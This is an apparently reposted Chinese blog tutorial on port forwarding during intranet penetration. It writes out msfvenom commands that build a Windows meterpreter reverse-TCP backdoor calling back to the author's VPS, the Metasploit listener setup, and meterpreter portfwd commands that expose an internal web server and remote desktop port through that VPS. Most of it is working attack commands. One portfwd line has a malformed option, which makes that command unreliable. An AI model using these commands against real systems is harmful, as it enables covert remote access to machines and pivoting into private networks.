文章目錄
- 前言
- 一、生成MSF后門程式并上線
- 二、使用portfwd實作埠轉發
- 1、埠轉發前測驗遠程連接和資料庫連接是否成功
- 2、進行埠映射
- 總結
前言
在內網滲透程序中,實作埠轉發是十分重要的一步,如:我們要進行遠程連接,但是它只允許內網主機連接;將內網訪問的網站轉發出來,實作外網可以訪問,要解決這些情況我們都可以通過埠轉發來解決,我們可以把內網埠轉發到出網的埠上,也可以把埠轉發到我們的 VPS主機上,下面以Windows2008服務器為目標服務器 ,以Ubantu為VPS主機,這里為了 方便假設我們已經拿下了服務器的控制權限,同時新建了用戶可以遠程連接,如有錯誤的地方,歡迎各位大佬在評論區批評指教,
一、生成MSF后門程式并上線
1、使用 MSF生成payload,讓目標主機上線,這里的MSF我是搭建在VPS上的,還有不知道咋個在云服務器上搭建MSF可以參考此鏈接:云服務搭建MSF環境
msfvenom -p windows/meterpreter/reverse_tcp lhost=101.**.17*.172 lport=12341 -f exe > a1.exe
2、在MSF中設定監聽
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 101.**.17*.172 #VPS的IP
set lport 12341
run
3、在目標服務器端運行木馬程式,發現主機上線,同時也知道了公網IP地址為:222.**.14.3
二、使用portfwd實作埠轉發
1、埠轉發前測驗遠程連接和資料庫連接是否成功
1、遠程連接測驗:
win+r 輸入:mstsc
輸入目標主機的公網IP地址:222.***.14*.3
連接失敗
2、網站訪問測驗,回傳無法連接
2、進行埠映射
方法1:
portfwd add -l 101.37.173.172 -l 2020 -p 80 -r 192.168.111.19
通過將內網的80埠轉發到VPS上的2020埠,我們就可以直接訪問VPS的2020埠就可以訪問到內網的80埠,這樣進一步尋找內網網站漏洞就更加方便
同理我們來轉發內網的3389就埠,實作可以遠程訪問:
portfwd add -l 101.37.173.172 -l 2021 -p 3389 -r 192.168.111.19
方法2:
這里我就不截圖進行證明了,直接寫上用法:
轉發內網80埠:
portfwd add -l 2022 -p 80 -r 192.168.111.19
轉發內網3389埠:
portfwd add -l 2023 -p 3389 -r 192.168.111.19
這樣也可以實作埠轉發,這個時候我們可以使用一下命令來查看當前建立的埠轉發情況和清除建立的埠轉發
portfwd list #查看轉發表
portfwd flush #清空轉發表
總結
埠轉發在內網滲透中是非常重要的,還有很多方法可以實作埠轉發,后面的方法將會在以后的文章中慢慢更新,里面有錯誤的地方還請大佬們批評指正,相互進步,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/402650.html
標籤:其他